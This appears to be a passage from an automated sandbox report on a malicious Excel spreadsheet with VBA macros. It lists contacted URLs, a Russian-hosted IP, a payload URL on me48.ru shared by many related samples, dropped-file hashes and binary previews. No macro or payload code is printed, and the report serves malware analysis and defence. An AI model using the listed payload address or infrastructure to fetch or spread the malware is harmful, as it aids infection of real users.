                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/macCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devicesCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorizeCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      188.225.24.87
                                                                                                                                                      unknownRussian Federation
                                                                                                                                                      9123TIMEWEB-ASRUfalse

                                                                                                                                                      Private

                                                                                                                                                      IP
                                                                                                                                                      192.168.2.1

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:324312
                                                                                                                                                      Start date:29.11.2020
                                                                                                                                                      Start time:05:54:32
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 4m 9s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:document-1444032431.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:23
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal80.expl.evad.winXLS@3/6@1/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.255.188.83, 13.88.21.125, 52.109.32.27, 52.109.12.24, 52.109.12.23, 51.104.146.109, 2.20.84.85, 20.54.26.129, 2.20.142.210, 2.20.142.209, 92.122.213.194, 92.122.213.247, 51.11.168.160
                                                                                                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      188.225.24.87document-1444032431.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1421190491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1421190491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1473929595.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1473929595.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1484980114.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1493705687.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1484980114.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1493705687.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1495480491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1495480491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1466663902.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1466663902.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1470167594.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1470167594.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1470686903.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1470686903.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1500762737.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1500762737.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif
                                                                                                                                                      document-1474276477.xlsGet hashmaliciousBrowse
                                                                                                                                                      • me48.ru/ds/231120.gif

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      me48.rudocument-1421190491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1421190491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1473929595.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1473929595.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1484980114.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1493705687.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1484980114.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1493705687.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1495480491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1495480491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1466663902.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1466663902.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1470167594.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1470167594.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1470686903.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1470686903.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1500762737.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1500762737.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1474276477.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      TIMEWEB-ASRUdocument-1444032431.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1421190491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1421190491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1473929595.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1473929595.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1484980114.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1493705687.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1484980114.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1493705687.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1495480491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1495480491.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1466663902.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1466663902.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1470167594.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1470167594.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1470686903.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1470686903.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1500762737.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1500762737.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87
                                                                                                                                                      document-1474276477.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 188.225.24.87

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CD757FD3-0BC4-48FD-8B4E-C4F841C67511
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):129952
                                                                                                                                                      Entropy (8bit):5.378353763554148
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:6cQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:QmQ9DQW+zBX8u
                                                                                                                                                      MD5:D2C9789401E280209E5082D2CAAD196F
                                                                                                                                                      SHA1:C1603C91A3C02526EDAEB4E664E6C09909B5E463
                                                                                                                                                      SHA-256:9826AE914F9AC3037A54B104D4BC7CA31293AB2471E8C1F8C4AE9E8CEFFF9815
                                                                                                                                                      SHA-512:CEBD119563036B40DE8AFBB2573D75E1E12BF32187C2CC9048896B6446DABDAFA602E0738E804CFBAE32D5DEB4F5D7187A1BA7244968786E1A3A9F0F3E6263BD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-29T04:55:27">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\B6910000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):314572
                                                                                                                                                      Entropy (8bit):7.985622134696433
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:mBEmiPirFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+M34:9oFPM8R3AsB+bjej/9cl
                                                                                                                                                      MD5:A5F0AADD16192CBBDA5C2AC17A20672D
                                                                                                                                                      SHA1:012DA188E8643BAB7C49EF2E0B5E55BAD622B217
                                                                                                                                                      SHA-256:343C31F99E9F7B803224ED400B8F6842AD90DACEA7EDA5A8F7366EF431643CE3
                                                                                                                                                      SHA-512:99FACC56DA99D1179ABA596B085D4C8C2E379AC6521ACBCCDF69872793BF79A0B878E4EA491BB4E79BC52519A8BCF065D2E40A2676C759F85E68F4D804642A97
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .V.n.0....?......(..r.izl.$...\K....I..RV.4p,.6.^..vfv....jcM....w5..f..'........WV`.N....l....?.....h.5kS..8G..X...VV>Z..66<...........%p.L..-..a%.L*n6.x.d..+.w.e......".P...+..VZ.....t.!.P..$k..51.;H..C..r....6k...GD08Mf.CE.]*...7....>.q...Q+(nEL?.%....'..K...a.l...6.L.9VY!..qbi..v...0u.......n....t.#::.S.........;.;.........C......=....@....r.f..;...;..m.ik..\....s+"..Dm.9....#:T.OY../N............p.....> .....<O..]....4.3e_...i...1.@....O..........PK..........!.C.T.....e.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sun Nov 29 12:55:29 2020, atime=Sun Nov 29 12:55:29 2020, length=12288, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.652566226194013
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8aXUlCpuElPCH21YCPT50Y9+L/w+WrjAZ/2bD2LC5Lu4t2Y+xIBjKZm:8QRJP1AZiD387aB6m
                                                                                                                                                      MD5:9E9329F16FC41D282B1E19FC14DDEF8F
                                                                                                                                                      SHA1:A3C43AC0838BA1A1DF881D0904D5CA159AFC3EEE
                                                                                                                                                      SHA-256:3EFFE36C46E26E7C4793C9B50D9FA67E9EB6CA453151AFD6FCDAE39A3D44CEFF
                                                                                                                                                      SHA-512:C93C979156961A75E5E9DAAC08DCBF5FA3468B74A97E6EF68B97F268138DD209D8A45F03ED3B6F47E2C5BB34BF2105293F49811EED65DC6DD2139411F8408CAA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F........N....-..I..LW...I..LW....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Q.n....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.}Q.n.....S....................|..h.a.r.d.z.....~.1.....}Q.n..Desktop.h.......Ny.}Q.n.....Y..............>.....!6R.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......849224...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1444032431.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:41 2020, mtime=Sun Nov 29 12:55:29 2020, atime=Sun Nov 29 12:55:29 2020, length=338944, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4400
                                                                                                                                                      Entropy (8bit):4.678765969529913
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:8tBiUtwiUZjKtBiUtwiUZjKsBiUtwiUZjKsBiUtwiUZj:8tBdw8tBdw8sBdw8sBdw
                                                                                                                                                      MD5:ECF9C2F634555E7E0F8C6BA6A93F3401
                                                                                                                                                      SHA1:279350D53772FA6D3709C6201E809F8C5132951B
                                                                                                                                                      SHA-256:6A86B5EE2E564800B67F8363FCE74FCA5A677C05EC1CD2268BF236AC3AB225DD
                                                                                                                                                      SHA-512:81A70584BE9104295716069EF6A0B0F259708CDC31E4AC6227DDB4C02B069DDA7684EE237C208C1DA37ECBE8F786269BFBCD851C4A4275B006BE0547CB83FD07
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... .....D.:...`/!LW...`/!LW....,...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Q.n....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.}Q.n.....S....................|..h.a.r.d.z.....~.1.....>Qwx..Desktop.h.......Ny.}Q.n.....Y..............>......y~.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2..,..}Q.n .DOCUME~1.XLS..`......>Qux}Q.n....h.....................\.b.d.o.c.u.m.e.n.t.-.1.4.4.4.0.3.2.4.3.1...x.l.s.......]...............-.......\...........>.S......C:\Users\user\Desktop\document-1444032431.xls........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.4.4.0.3.2.4.3.1...x.l.s.........:..,.LB.)...As...`.......X.......849224...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):260
                                                                                                                                                      Entropy (8bit):4.617963465642737
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:dj6Y9L1VQDEL1VQJY9L1VQDEL1VQJY9L1VQDEL1VQJY9L1VQd:dmWtUWtUWtUWs
                                                                                                                                                      MD5:8C157F558754D3308CC591F5237F972C
                                                                                                                                                      SHA1:B8972DC92AE4F37172D0722C1FB4BA3C9CB8A2B6
                                                                                                                                                      SHA-256:E6F2C625A3A9C744D36E283EA05E800CF72116CE30833649096DC90248C21CD2
                                                                                                                                                      SHA-512:FE2DAA2460C01B3BE16FF7C1AC403782B87BE919F8089673FDE97BF2218C2B065C54CCF6AD736C56E3CAEC33A952992973480015978AC164F3A70E2AA1EE2CE1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[xls]..document-1444032431.xls.LNK=0..document-1444032431.xls.LNK=0..[xls]..document-1444032431.xls.LNK=0..document-1444032431.xls.LNK=0..[xls]..document-1444032431.xls.LNK=0..document-1444032431.xls.LNK=0..[xls]..document-1444032431.xls.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\87910000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):398743
                                                                                                                                                      Entropy (8bit):7.192715956388569
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:gcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdj:/izo8RnsIROnr6n75YCp
                                                                                                                                                      MD5:B4C3E524D691CC16449AEEE215FCCAAC
                                                                                                                                                      SHA1:E3690E178C52C753CD8A06E1E8EDE5767C2ED0D7
                                                                                                                                                      SHA-256:8BF59B7A6CC4CF7D3A84312FC4F1012CE96AACC56DAF83D12870A723E09CD95D
                                                                                                                                                      SHA-512:546E8B700B98F12E1B0C63B5712078DA77A7588E53F5966DF5C1B9F3CBB824CA1482DE4997F7FED0FB58DA7E9A6065FF2DCE293F91DF9DDE0B0281039E37FEFD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T8..........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:45:46 2020, Security: 0
                                                                                                                                                      Entropy (8bit):7.522918762403885
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                      File name:document-1444032431.xls
                                                                                                                                                      File size:338944
                                                                                                                                                      MD5:407b70bcaef4d41cc7f63ceb6412a692
                                                                                                                                                      SHA1:2cc134d5c5ea93bbbb0212f8d692484cc76766bd
                                                                                                                                                      SHA256:6bbfff6e9dd29269927c954da80d86b6f91928e2fd049a92a72dca9e08140bd1
                                                                                                                                                      SHA512:b48aba642ff0d96d50a6833c4076c476aa4255caed3f83c032b0936cb0df910e5aae99211122e678388e5f1f05fe2a71a8a5a194bfd47d40f75ac170e1fa8227
                                                                                                                                                      SSDEEP:6144:YcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTa:Cizo8RnsIROnr6n75YV
                                                                                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "document-1444032431.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1251
                                                                                                                                                      Author:
                                                                                                                                                      Last Saved By:
                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                      Last Saved Time:2020-11-26 09:45:46
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1251
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False
                                                                                                                                                      Shared Document:False
                                                                                                                                                      Changed Hyperlinks:False
                                                                                                                                                      Application Version:917504

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.367004077607
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
